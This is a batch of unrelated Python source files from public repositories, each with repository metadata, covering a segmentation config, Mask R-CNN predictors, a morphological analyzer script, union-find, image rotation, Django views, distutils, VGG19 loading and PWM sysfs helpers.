] | permissive | Junjun2016/sssegmentation | 7bbc5d53abee1e0cc88d5e989e4cff5760ffcd09 | bf7281b369e8d7fc2f8986caaeec3ec38a30c313 | refs/heads/main | 2023-02-04T22:09:13.921774 | 2020-12-23T06:28:56 | 2020-12-23T06:28:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,668 | py | '''base config for ce2p'''
# config for dataset
DATASET_CFG = {
'train': {
'type': '',
'set': 'train',
'rootdir': '',
'aug_opts': [('Resize', {'output_size': (2048, 512), 'keep_ratio': True, 'scale_range': (0.5, 2.0)}),
('RandomCrop', {'crop_size': (512, 512), 'one_category_max_ratio': 0.75}),
('RandomFlip', {'flip_prob': 0.5}),
('PhotoMetricDistortion', {}),
('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
('ToTensor', {}),
('Padding', {'output_size': (512, 512), 'data_type': 'tensor'}),]
},
'test': {
'type': '',
'set': 'val',
'rootdir': '',
'aug_opts': [('Resize', {'output_size': (2048, 512), 'keep_ratio': True, 'scale_range': None}),
('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
('ToTensor', {}),]
}
}
# config for dataloader
DATALOADER_CFG = {
'train': {
'type': ['nondistributed', 'distributed'][1],
'batch_size': 16,
'num_workers': 16,
'shuffle': True,
'pin_memory': True,
'drop_last': True,
},
'test': {
'type': ['nondistributed', 'distributed'][1],
'batch_size': 1,
'num_workers': 16,
'shuffle': False,
'pin_memory': True,
'drop_last': False,
}
}
# config for optimizer
OPTIMIZER_CFG = {
'type': 'sgd',
'sgd': {
'learning_rate': 0.01,
'momentum': 0.9,
'weight_decay': 5e-4,
},
'max_epochs': 0,
'params_rules': {},
'policy': {
'type': 'poly',
'opts': {'power': 0.9, 'max_iters': None, 'num_iters': None, 'num_epochs': None}
},
'adjust_period': ['iteration', 'epoch'][0],
}
# config for losses
LOSSES_CFG = {
'loss_cls_stage1': {
'celoss': {'scale_factor': 1.0, 'opts': {'ignore_index': 255, 'reduction': 'mean'}}
},
'loss_cls_stage2': {
'celoss': {'scale_factor': 1.0, 'opts': {'ignore_index': 255, 'reduction': 'mean'}}
},
'loss_edge': {
'celoss': {'scale_factor': 1.0, 'opts': {'ignore_index': 255, 'reduction': 'mean'}}
}
}
# config for model
MODEL_CFG = {
'type': 'ce2p',
'benchmark': True,
'num_classes': -1,
'align_corners': False,
'is_multi_gpus': True,
'distributed': {'is_on': True, 'backend': 'nccl'},
'norm_cfg': {'type': 'syncbatchnorm', 'opts': {}},
'act_cfg': {'type': 'leakyrelu', 'opts': {'negative_slope': 0.01, 'inplace': True}},
'backbone': {
'type': 'resnet101',
'series': 'resnet',
'pretrained': True,
'outstride': 16,
'is_use_stem': True
},
'ppm': {
'in_channels': 2048,
'out_channels': 512,
'pool_scales': [1, 2, 3, 6],
},
'epm': {
'in_channels_list': [256, 512, 1024],
'hidden_channels': 256,
'out_channels': 2
},
'shortcut': {
'in_channels': 256,
'out_channels': 48,
},
'decoder':{
'stage1': {
'in_channels': 560,
'out_channels': 512,
'dropout': 0,
},
'stage2': {
'in_channels': 1280,
'out_channels': 512,
'dropout': 0.1
},
},
}
# config for common
COMMON_CFG = {
'train': {
'backupdir': '',
'logfilepath': '',
'loginterval': 50,
'saveinterval': 1
},
'test': {
'backupdir': '',
'logfilepath': '',
'resultsavepath': ''
}
} | [
"1159254961@qq.com"
] | 1159254961@qq.com |
05d4e7398b6baf2c1f7de7b84f7a6e0e81cb0afb | d8fa0ed226e6dbc0f607961c8b711362942b120a | /maskrcnn_benchmark/modeling/roi_heads/pred_head/roi_pred_predictors.py | 61f4ef46ed49d5168e57a75390aabcbf51111053 | [] | no_license | ltnghia/video-maskrcnn | 70d003f038f82156ec9a8dca4ce1b8ea1190792c | b0bc8eb8b43a8b45335625525eba620b389ba591 | refs/heads/master | 2021-06-19T11:13:29.058747 | 2021-04-01T02:19:07 | 2021-04-01T02:19:07 | 199,971,172 | 8 | 4 | null | null | null | null | UTF-8 | Python | false | false | 3,052 | py | from maskrcnn_benchmark.modeling import registry
from torch import nn
import math
import torch
from maskrcnn_benchmark.modeling.make_layers import make_fc
@registry.ROI_PRED_PREDICTOR.register("FastRCNNPredictor")
class FastRCNNPredictor(nn.Module):
def __init__(self, cfg, in_channels):
super(FastRCNNPredictor, self).__init__()
assert in_channels is not None
num_inputs = in_channels
num_classes = cfg.MODEL.ROI_PRED_HEAD.NUM_CLASSES
self.avgpool = nn.AdaptiveAvgPool2d(1)
if num_classes > 0:
self.pred_score = make_fc(num_inputs, num_classes, use_gn=False)
# self.pred_score = nn.Linear(num_inputs, num_classes)
#
# nn.init.normal_(self.pred_score.weight, mean=0, std=0.01)
# nn.init.constant_(self.pred_score.bias, 0)
if cfg.MODEL.ROI_PRED_HEAD.USE_FOCAL_LOSS:
# bias_init for sigmoid focal loss
prior_prob = cfg.MODEL.ROI_PRED_HEAD.PRIOR_PROB
bias_value = -math.log((1 - prior_prob) / prior_prob)
nn.init.constant_(self.pred_score.bias, bias_value)
elif cfg.MODEL.ROI_PRED_HEAD.USE_CLASS_BALANCE_LOSS:
# bias_init for class balance loss
bias_value = -math.log(num_classes - 1)
nn.init.constant_(self.pred_score.bias, bias_value)
def forward(self, x):
x = self.avgpool(x)
x = x.view(x.size(0), -1)
pred_logit = self.pred_score(x)
return pred_logit
@registry.ROI_PRED_PREDICTOR.register("FPNPredictor")
class FPNPredictor(nn.Module):
def __init__(self, cfg, in_channels):
super(FPNPredictor, self).__init__()
num_classes = cfg.MODEL.ROI_PRED_HEAD.NUM_CLASSES
representation_size = in_channels
if num_classes > 0:
self.pred_score = make_fc(representation_size, num_classes, use_gn=False)
# self.pred_score = nn.Linear(representation_size, num_classes)
#
# nn.init.normal_(self.pred_score.weight, std=0.01)
# nn.init.constant_(self.pred_score.bias, 0)
if cfg.MODEL.ROI_PRED_HEAD.USE_FOCAL_LOSS:
# bias_init for sigmoid focal loss
prior_prob = cfg.MODEL.ROI_PRED_HEAD.PRIOR_PROB
bias_value = -math.log((1 - prior_prob) / prior_prob)
nn.init.constant_(self.pred_score.bias, bias_value)
elif cfg.MODEL.ROI_PRED_HEAD.USE_CLASS_BALANCE_LOSS:
# bias_init for class balance loss
bias_value = -math.log(num_classes - 1)
nn.init.constant_(self.pred_score.bias, bias_value)
def forward(self, x):
if x.ndimension() == 4:
assert list(x.shape[2:]) == [1, 1]
x = x.view(x.size(0), -1)
scores = self.pred_score(x)
return scores
def make_roi_pred_predictor(cfg, in_channels):
func = registry.ROI_PRED_PREDICTOR[cfg.MODEL.ROI_PRED_HEAD.PREDICTOR]
return func(cfg, in_channels)
| [
"trungnghiadk@gmail.com"
] | trungnghiadk@gmail.com |
fdc61ea92d64ff7e6860e3bbbd86c25e0cf2f2b3 | 44e85fa836a4099478a1c17f920cbd9f8b862ccb | /pos_language_model/morph_analyzer_single_counts_main.py | 57721f417c8fff33874a256f2f433158b4fa7c48 | [] | no_license | yukitomo/jp_robust_morphame_analysis | 7da9c4fdb3a743704d2e5f0acfb1a177c031230e | 6ca8b22a08003da7ce32201f9fe7968b92889643 | refs/heads/master | 2021-01-25T07:28:47.093365 | 2015-04-20T23:51:46 | 2015-04-20T23:51:46 | 27,806,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,823 | py | #!/usr/bin/python
#-*-coding:utf-8-*-
#2015-01-31 Yuki Tomo
import pickle
import math
import jctconv
import string
import sys
from collections import defaultdict
from make_dict_obj import Morph
from morph_analizer_counts import *
def main():
"""
posid_unigram_freq : 品詞の頻度
posid_bigram_freq : 品詞バイグラムの頻度
posid_word_freq : 品詞と単語の組み合わせの頻度
初期値
P(c_i|c_i-1) = freq(c_i|c_i-1) / freq(c_i-1)
P(v|c) = freq(v|c) / freq(c)
誤り化初期値 0.01
P(w|v) = 0.01
P(v|v) = 0.99
v → w : の展開するパターンを初期値として持っておく。
freq(w|v) : mecab辞書の読みから頻度0のvalue値として持っておく
学習の流れ
1. mecabで解析しカウントした頻度(freq_d)の読み込み
freq(c)_d, freq(v)_d
freq(c_i|c_i-1)_d, freq(v|c)_d
2.確率値の計算(あらかじめ計算しておく)
P(c_i|c_i-1), P(v|c)
3.現在のパラメータで誤り文を解析し、頻度を更新(freq_e)
freq(c)_e, freq(v)_e
freq(c_i|c_i-1)_e, freq(v|c)_e
freq(w|v)_e
4.確率値の再計算 (カウント数が変化した部分[分母が更新されたもの]だけ変更)
P(c_i|c_i-1), P(v|c)
P(w|v)
5. 3,4を繰り返す
input : 大量の日本語誤り文が格納されたファイル
"""
#--------------------------初期設定------------------------------------
#品詞id, 読みの辞書の読み込み
dict_dir = "/Users/yukitomo/Research/jp_robust_morphame_analysis/data/mecab-ipadic-2.7.0-20070801-utf8/"
pkl_dir = "/Users/yukitomo/Research/jp_robust_morphame_analysis/pkl_data/"
id_def = load_2colums(open(dict_dir + "left-id.def","r")," ") #mecabはr,l同じID
read_pron_dic = pickle.load(open(pkl_dir + "ipadic_read_pron_dict.pkl", "r"))
#1.初期頻度_dの読み込み
#毎日新聞
pkl_dir = "/Users/yukitomo/Research/jp_robust_morphame_analysis/pkl_data/"
c_freq_d = pickle.load(open(pkl_dir + "mainichi_posid_unigram_counts.pkl","r")) #freq(c)
cc_freq_d = pickle.load(open(pkl_dir + "mainichi_posid_bigram_counts.pkl","r")) #freq(c_i|c_i-1)
vc_freq_d = pickle.load(open(pkl_dir + "mainichi_posid_word_counts.pkl","r")) #freq(v|c)
#for pos, v_dict in vc_freq_d.items():
# for v, freq in v_dict.items():
# print pos, v, freq
#for pos, freq in c_freq_d.items():
# print pos, freq
#dict check
#print cc_freq_d
#for k1, v1 in cc_freq_d.items():
# for k2, v2 in v1.items():
# if k1 == "B":
# print k1,k2,v2
#print vc_freq_d
#w_v_freq_d : 存在しないがとりあえず格納
v_freq_d = {}
wv_freq_d = defaultdict(dict)
#Freq クラスに格納 初期頻度freq_d
freq_d = Freq(c_freq_d, cc_freq_d, vc_freq_d, wv_freq_d, v_freq_d)
#Eステップで更新する頻度の初期化 freq_e
freq_e = Freq(defaultdict(int), defaultdict(dict), defaultdict(dict), defaultdict(dict), defaultdict(int))
#2.初期頻度_dから確率値の計算をし、コスト(対数)に変換
cc_cost_e = freq_d.calc_cost("cc", 10)
vc_cost_e = freq_d.calc_cost("vc", 10)
wv_cost_e = freq_d.calc_cost("wv", 10)
#Costオブジェクトに格納
cost_dict = Cost(cc_cost_e, vc_cost_e, wv_cost_e)
#------------------初期値でのデコード例----------------------------------
"""
#文の入力
#input_sent = raw_input('input a sentence\n')
input_sent = "ごはんをたべる。"
#ラティスの生成
lm = Lattice_Maker(cost_dict.vc, read_pron_dic, cost_dict.wv, cost_dict.cc, id_def)
lattice = lm.create_lattice(input_sent)
#pickle.dump(lattice, open(pkl_dir + "lattice_gohanwotaberu.pkl","w"))
#ビタビによる最適な系列の決定
best_sequence = lm.viterbi(lattice)
#最適系列の出力
lm.show_best_sequence(best_sequence)
#最適系列から得られた頻度
increase_counts = lm.return_best_sequence_counts(best_sequence)
#コストの更新
print increase_counts.show_info()
[cost_dict, freq_e] = update_cost_freq(cost_dict, freq_e, freq_d, increase_counts)
cost_dict.show_info()
"""
#-----------------------------------------------------------------------
#-------------------学習----------------------------------------
#ファイルの入力
input_sent = raw_input('input\n')
print "input_sent : ", input_sent
#updateされたコストをモデルに組み込む
lm = Lattice_Maker(cost_dict, read_pron_dic, id_def)
#ラティスの生成
lattice = lm.create_lattice(input_sent)
#ビタビによる最適な系列の決定
best_sequence = lm.viterbi(lattice)
#最適系列の出力
lm.show_best_sequence(best_sequence)
#最適系列から得られた頻度
increase_counts = lm.return_best_sequence_counts(best_sequence)
#コストのアップデート
[cost_dict, freq_e] = update_cost_freq(cost_dict, freq_e, freq_d, increase_counts)
if __name__ == '__main__':
main() | [
"over.the.tr0ouble@gmail.com"
] | over.the.tr0ouble@gmail.com |
91e40c70561c19a95bdf6e85872cc990ed29743d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02762/s492187443.py | d50e3beeefcb45621883846f22b51342ddd97ea9 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,422 | py | import collections
class UnionFind:
def __init__(self, N):
self.parent = [i for i in range(N)]
self.rank = [0]*N
self.count = 0
def root(self, a):
if self.parent[a]==a:
return a
else:
self.parent[a]=self.root(self.parent[a])
return self.parent[a]
def size(x):
return -par[root(x)]
def is_same(self, a, b):
return self.root(a)==self.root(b)
def unite(self, a, b):
ra = self.root(a)
rb = self.root(b)
if ra == rb: return
if self.rank[ra] < self.rank[rb]:
self.parent[ra] = rb
else:
self.parent[rb] = ra
if self.rank[ra] == self.rank[rb]: self.rank[ra] += 1
self.count += 1
def main():
n,m,k=map(int, input().split())
friend = [0]*n
fr = UnionFind(n)
blocklist = [0]*n
for i in range(m):
a,b = map(int, input().split())
fr.unite(a-1,b-1)
friend[a-1]+=1
friend[b-1]+=1
for i in range(k):
c,d=map(int, input().split())
if(fr.root(c-1)==fr.root(d-1)):
blocklist[c-1]+=1
blocklist[d-1]+=1
res = []
dd = collections.defaultdict(int)
for i in range(n):
dd[fr.root(i)]+=1
for i in range(n):
res.append(dd[fr.root(i)]- blocklist[i] - friend[i]-1)
print(*res)
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
2c36910a906c4c9ba81c09a28d3c666e18ad3e0c | b22e40b12e198af858dbf71cdb85f459314c0e37 | /image_utils.py | c721a20228730f3744ad52aa2f9ebe1448380216 | [] | no_license | gauenk/python_modules | 8b40626b566e4fdd7db6fc830255ed3daa34b039 | 632d4813a8e182c74b950d98f3f5b98732d8d6ad | refs/heads/master | 2020-12-15T16:34:42.542568 | 2020-06-09T15:47:43 | 2020-06-09T15:47:43 | 235,180,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,529 | py | import numpy as np
import cv2
def overflowOnly(coordinate,rows,cols):
if 0 > coordinate[0]: coordinate[0] = np.abs(coordinate[0])
elif rows < coordinate[0]: coordinate[0] = rows - coordinate[0]
if 0 > coordinate[1]: coordinate[1] = np.abs(coordinate[1])
elif cols < coordinate[1]: coordinate[1] = cols - coordinate[1]
def zeroInTheRegion(coordinate,rows,cols):
if 0 <= coordinate[0] and coordinate[0] <= rows: coordinate[0] = 0
if 0 <= coordinate[1] and coordinate[1] <= cols: coordinate[1] = 0
def correctTranslatedIndex(coordinate,rows,cols):
zeroInTheRegion(coordinate,rows,cols)
overflowOnly(coordinate,rows,cols)
def getRotationScale(M,rows,cols):
a = np.array([cols,0,1])
b = np.array([0,0,1])
ta = np.matmul(M,a)
tb = np.matmul(M,b)
correctTranslatedIndex(ta,rows,cols)
correctTranslatedIndex(tb,rows,cols)
scale_a_0 = rows / ( 2. * np.abs(ta[0]) + rows )
scale_a_1 = rows / ( 2. * np.abs(ta[1]) + rows )
scale_b_0 = cols / ( 2. * np.abs(tb[0]) + cols )
scale_b_1 = cols / ( 2. * np.abs(tb[1]) + cols )
scale_list = [scale_a_0,scale_a_1,scale_b_0,scale_b_1]
scale = np.min([scale_a_0,scale_a_1,scale_b_0,scale_b_1])
return scale
def getRotationInfo(angle,cols,rows):
rotationMat = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1.0)
scale = getRotationScale(rotationMat,rows,cols)
rotationMat = cv2.getRotationMatrix2D((cols/2,rows/2),angle,scale)
return rotationMat,scale
def rotateImage(img,angle):
# print('angle',angle)
if angle is False:
return img,None
im_shape = img.shape
rows,cols = img.shape[:2]
rotationMat, scale = getRotationInfo(angle,cols,rows)
img = cv2.warpAffine(img,rotationMat,(cols,rows),scale)
rotateInfo = [angle,cols,rows,im_shape]
return img,rotateInfo
def rotateImageList(imageList,angle):
rot_image_list = []
if type(imageList) is list:
for image_index,image in enumerate(imageList):
rot_image,_ = rotateImage(image,angle)
rot_image_list.append(rot_image)
else:
is_single_bw_image_bool = (len(imageList.shape) == 2)
is_single_color_image_bool = (len(imageList.shape) == 3) and (imageList.shape[2] == 3)
if is_single_bw_image_bool or is_single_color_image_bool:
print("actually single image; not list")
rot_image,_ = rotateImage(imageList,angle)
return rot_image
for image_index in range(imageList.shape[0]):
image = np.squeeze(imageList[image_index,...])
rot_image,_ = rotateImage(image,angle)
rot_image_list.append(rot_image)
return rot_image_list
def saveImageList(imageList,prefix_name="save_image",label_string=None):
if type(imageList) is list:
for image_index,image in enumerate(imageList):
if label_string is not None:
filename = "{}_{}_{}.png".format(prefix_name,image_index,label_string[image_index])
else:
filename = "{}_{}.png".format(prefix_name,image_index)
cv2.imwrite(filename,image)
else:
for image_index in range(imageList.shape[0]):
image = np.squeeze(imageList[image_index])
if label_string is not None:
filename = "{}_{}_{}.png".format(prefix_name,image_index,label_string[image_index])
else:
filename = "{}_{}.png".format(prefix_name,image_index)
cv2.imwrite(filename,image)
| [
"kent.gauen@gmail.com"
] | kent.gauen@gmail.com |
afb8c441118da9ce0c7ceb12fc640da170000a66 | d9e8b7d5c468b38cdf18cece9dff12ad1188a71b | /DiscussionForum/Postapp/views.py | 7cf20fbdb26a0e0028127630d851e46d326f9dac | [] | no_license | Ruchika-Munde/Django_Task | f14e0497a4f8045a68dbe58bbd772abf606369d3 | 7fa549842a544527b9f78cbfcf52c26dde31463c | refs/heads/master | 2022-12-16T17:53:12.577323 | 2020-09-09T07:34:43 | 2020-09-09T07:34:43 | 294,036,604 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,502 | py | from django.shortcuts import render,redirect
from Postapp.forms import Addpostform
from Postapp.models import Post
from django.views import View
from Userapp.models import User
from Commentapp.forms import commentform
from Postapp.decorator import user_login
# Create your views here.
#for add post
class base(View):
def get(self,request):
return render(request,'base.html')
class Addpost(View):
@user_login
def get(self,request):
pform=Addpostform()
return render (request,'post.html',{'pform':pform})
def post(self,request,*args,**kwargs):
pform=Addpostform(request.POST,request.FILES)
if(pform.is_valid()):
post=Post(title=pform.cleaned_data['title'],description=pform.cleaned_data['description'],ptag=pform.cleaned_data['ptag'])
if(request.FILES):
post.fileupload = pform.cleaned_data['fileupload']
uid=request.session.get('uid')
print(uid)
user_obj=User.objects.get(pk=uid)
post.postbyuser=user_obj
post.save()
return redirect('/postapp/showpost/')
# for show post
class posttitle(View):
def get(self,request):
obj=Post.objects.all()
return render(request,'home.html',{'obj':obj})
# show post details
class postdetails(View):
def get(self,request,id):
pobj=Post.objects.get(pk=id)
form = commentform()
return render(request,'postdetails.html',{'pobj':pobj,'form':form})
| [
"ruchamunde@gmail.com"
] | ruchamunde@gmail.com |
878c2b75897dabb57c8c8b8f229f2b4c3c2fda3e | 7823d31688879b2d4dcfd2e3c11fb2c862f35a23 | /AlexNet/cifar/__init__.py | 0e34a0daf85c1391567619a425f9e1606cb30503 | [] | no_license | FMsunyh/dlfive | 7637631f54520673e4ec417b3c02b5334ecdf026 | ffae48aac5ece4de5ff9afccc69b093a72e09637 | refs/heads/master | 2021-09-19T05:59:51.040214 | 2018-07-24T06:29:40 | 2018-07-24T06:29:40 | 108,929,499 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 11/30/2017 10:43 AM
# @Author : sunyonghai
# @File : __init__.py
# @Software: BG_AI
# ========================================================= | [
"fmsunyh@gmail.com"
] | fmsunyh@gmail.com |
497130a66a1d5cb4e762cfd18224838b0a235273 | 3dc647cd07a7361ed401e40d2b7cce8c826c8f6c | /Lib/distutils/command/install_headers.py | 9bb0b18dc0d809dbc03d9ca355818b3bb0af573b | [
"CC-BY-4.0",
"MIT",
"Python-2.0"
] | permissive | RustPython/RustPython | 5ddce4a9848b9de8c041ffd2634f83c0105d3f39 | b864e5da1f18897fc884180b7093df5aa170024f | refs/heads/main | 2023-09-04T12:38:29.458699 | 2023-09-03T12:33:42 | 2023-09-03T12:33:42 | 135,201,145 | 15,815 | 1,302 | MIT | 2023-09-14T08:11:45 | 2018-05-28T19:27:01 | Rust | UTF-8 | Python | false | false | 1,298 | py | """distutils.command.install_headers
Implements the Distutils 'install_headers' command, to install C/C++ header
files to the Python include directory."""
from distutils.core import Command
# XXX force is never used
class install_headers(Command):
description = "install C/C++ header files"
user_options = [('install-dir=', 'd',
"directory to install header files to"),
('force', 'f',
"force installation (overwrite existing files)"),
]
boolean_options = ['force']
def initialize_options(self):
self.install_dir = None
self.force = 0
self.outfiles = []
def finalize_options(self):
self.set_undefined_options('install',
('install_headers', 'install_dir'),
('force', 'force'))
def run(self):
headers = self.distribution.headers
if not headers:
return
self.mkpath(self.install_dir)
for header in headers:
(out, _) = self.copy_file(header, self.install_dir)
self.outfiles.append(out)
def get_inputs(self):
return self.distribution.headers or []
def get_outputs(self):
return self.outfiles
| [
"33094578+coolreader18@users.noreply.github.com"
] | 33094578+coolreader18@users.noreply.github.com |
5f51abe52378a636ea41db4efa51780a173e9ad5 | 6b265b404d74b09e1b1e3710e8ea872cd50f4263 | /Python/CodeTesting/Asserts/fac.py | 7572aa64bddf2acdd30e38c0485814ca7db55178 | [
"CC-BY-4.0"
] | permissive | gjbex/training-material | cdc189469ae2c7d43784ecdcb4bcca10ecbc21ae | e748466a2af9f3388a8b0ed091aa061dbfc752d6 | refs/heads/master | 2023-08-17T11:02:27.322865 | 2023-04-27T14:42:55 | 2023-04-27T14:42:55 | 18,587,808 | 130 | 60 | CC-BY-4.0 | 2023-08-03T07:07:25 | 2014-04-09T06:35:58 | Jupyter Notebook | UTF-8 | Python | false | false | 539 | py | #!/usr/bin/env python
def fac(n):
'''compute the factorial of given number'''
assert type(n) == int, 'argument must be integer'
assert n >= 0, 'argument must be positive'
if n > 1:
return n*fac(n - 1)
else:
return 1
if __name__ == '__main__':
for i in range(5):
print('{0}! = {1}'.format(i, fac(i)))
for i in [-2, 0.3, 3.0]:
try:
print('{0}! = {1}'.format(i, fac(i)))
except AssertionError as error:
print('{0}! failed: "{1}"'.format(i, error))
| [
"geertjan.bex@uhasselt.be"
] | geertjan.bex@uhasselt.be |
90e80b34f6a4d3649a476769aa02209fa9c279ee | 2af6a5c2d33e2046a1d25ae9dd66d349d3833940 | /res/scripts/client/gui/shared/gui_items/dossier/achievements/strategicoperationsachievement.py | e881003ec46abf209367c8d18f410da809eed7fb | [] | no_license | webiumsk/WOT-0.9.12-CT | e6c8b5bb106fad71b5c3056ada59fb1aebc5f2b2 | 2506e34bd6634ad500b6501f4ed4f04af3f43fa0 | refs/heads/master | 2021-01-10T01:38:38.080814 | 2015-11-11T00:08:04 | 2015-11-11T00:08:04 | 45,803,240 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 1,075 | py | # 2015.11.10 21:29:19 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/shared/gui_items/dossier/achievements/StrategicOperationsAchievement.py
from abstract import ClassProgressAchievement
from dossiers2.ui.achievements import ACHIEVEMENT_BLOCK as _AB
class StrategicOperationsAchievement(ClassProgressAchievement):
def __init__(self, dossier, value = None):
super(StrategicOperationsAchievement, self).__init__('strategicOperations', _AB.RATED_7X7, dossier, value)
def getNextLevelInfo(self):
return ('winsLeft', self._lvlUpValue)
def _readProgressValue(self, dossier):
return dossier.getRecordValue(_AB.RATED_7X7, 'strategicOperations')
def _readCurrentProgressValue(self, dossier):
return dossier.getTotalStats().getWinsCount()
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\shared\gui_items\dossier\achievements\strategicoperationsachievement.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.10 21:29:19 Střední Evropa (běžný čas)
| [
"info@webium.sk"
] | info@webium.sk |
bfb73d4604aeb01237151f4498cf682dc33c7707 | 4ba3a17f53985700de7b9e2c6ef9b9b5f1ad2e8d | /vgg.py | 3557e2cbdec843382f81dba825f678e3eaf7ef5f | [] | no_license | brjathu/style_kernel | fcba958221ba203ad87c8c855726f8d43f7fdd1e | f9c285f38b54132c957bb1543f434a7d2ae3e178 | refs/heads/master | 2021-07-25T19:37:25.174814 | 2017-11-08T02:07:44 | 2017-11-08T02:07:44 | 103,022,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,153 | py | import tensorflow as tf
import numpy as np
import scipy.io
VGG19_LAYERS = (
'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',
'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',
'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',
'relu3_3', 'conv3_4', 'relu3_4', 'pool3',
'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',
'relu4_3', 'conv4_4', 'relu4_4', 'pool4',
'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',
'relu5_3', 'conv5_4', 'relu5_4'
)
def load_net(data_path):
data = scipy.io.loadmat(data_path)
mean = data['normalization'][0][0][0]
mean_pixel = np.mean(mean, axis=(0, 1))
weights = data['layers'][0]
return weights, mean_pixel
def net_preloaded(weights, input_image, pooling):
net = {}
current = input_image
for i, name in enumerate(VGG19_LAYERS):
kind = name[:4]
if kind == 'conv':
kernels, bias = weights[i][0][0][0][0]
# matconvnet: weights are [width, height, in_channels, out_channels]
# tensorflow: weights are [height, width, in_channels, out_channels]
kernels = np.transpose(kernels, (1, 0, 2, 3))
bias = bias.reshape(-1)
current = _conv_layer(current, kernels, bias)
elif kind == 'relu':
current = tf.nn.relu(current)
elif kind == 'pool':
current = _pool_layer(current, pooling)
net[name] = current
assert len(net) == len(VGG19_LAYERS)
return net
def _conv_layer(input, weights, bias):
conv = tf.nn.conv2d(input, tf.constant(weights), strides=(1, 1, 1, 1),
padding='SAME')
return tf.nn.bias_add(conv, bias)
def _pool_layer(input, pooling):
if pooling == 'avg':
return tf.nn.avg_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),
padding='SAME')
else:
return tf.nn.max_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),
padding='SAME')
def preprocess(image, mean_pixel):
return image - mean_pixel
def unprocess(image, mean_pixel):
return image + mean_pixel
| [
"brjathu@gmail.com"
] | brjathu@gmail.com |
08d9b6d4b9d5aeff1c5b501d48c1cfbe84d1d66f | 52542d7f93a97db5433293781e0b514f5330a127 | /USV_V1/sensor/src/test_ws/sensor_dep/pwm_func.py | 7970ffc38fabc807d658c570608d343aed3e3cb9 | [
"Apache-2.0"
] | permissive | supcon-nzic/USV | 437002ade39a8d4c70930c56127943a707152b83 | 52c97759f97f3222ca5465a5745842cfeb7f26a1 | refs/heads/master | 2022-11-20T11:38:11.783570 | 2020-07-28T01:09:37 | 2020-07-28T01:09:37 | 279,798,518 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,707 | py | # -*- coding: utf-8 -*-
import string
def pwm_export(pwm_num):
pwm_num = str(pwm_num)
pwm = '/sys/class/pwm/pwmchip/export'
pwm_dir = pwm[:22] + pwm_num + pwm[22:]
file_export = open(pwm_dir,'w')
file_export.write('0')
file_export.close
def pwm_unexport(pwm_num):
pwm_num = str(pwm_num)
pwm = '/sys/class/pwm/pwmchip/unexport'
pwm_dir = pwm[:22] + pwm_num + pwm[22:]
file_unexport = open(pwm_dir,'w')
file_unexport.write('0')
file_unexport.close
def pwm_period_config(pwm_num, period):
pwm_num = str(pwm_num)
pwm = '/sys/class/pwm/pwmchip/pwm0/period'
pwm_dir = pwm[:22] + pwm_num + pwm[22:]
file_period = open(pwm_dir,'w')
pwm_period = str(period)
file_period.write(pwm_period)
file_period.close()
def pwm_duty_cycle_config(pwm_num, duty_cycle):
pwm_num = str(pwm_num)
pwm = '/sys/class/pwm/pwmchip/pwm0/duty_cycle'
pwm_dir = pwm[:22] + pwm_num + pwm[22:]
file_duty = open(pwm_dir,'w')
pwm_duty_cycle = str(duty_cycle)
file_duty.write(pwm_duty_cycle)
file_duty.close()
def pwm_enable(pwm_num):
pwm_num = str(pwm_num)
pwm = '/sys/class/pwm/pwmchip/pwm0/enable'
pwm_dir = pwm[:22] + pwm_num + pwm[22:]
file_enable = open(pwm_dir,'w')
pwm_enable = str("1")
file_enable.write(pwm_enable)
file_enable.close()
def pwm_capture(pwm_num):
pwm_num = str(pwm_num)
pwm = '/sys/class/pwm/pwmchip/pwm0/capture'
pwm_dir = pwm[:22] + pwm_num + pwm[22:]
file_capture = open(pwm_dir)
pwm_capture = file_capture.read()
period = pwm_capture.split(' ')[0]
duty_cycle = pwm_capture.split(' ')[1]
pwm_capture_period = int(period)
pwm_capture_duty_cycle = int(duty_cycle)
file_capture.close()
return pwm_capture_period, pwm_capture_duty_cycle
# return pwm_capture_duty_cycle
| [
"qiuyunpeng@nz-ic.com"
] | qiuyunpeng@nz-ic.com |
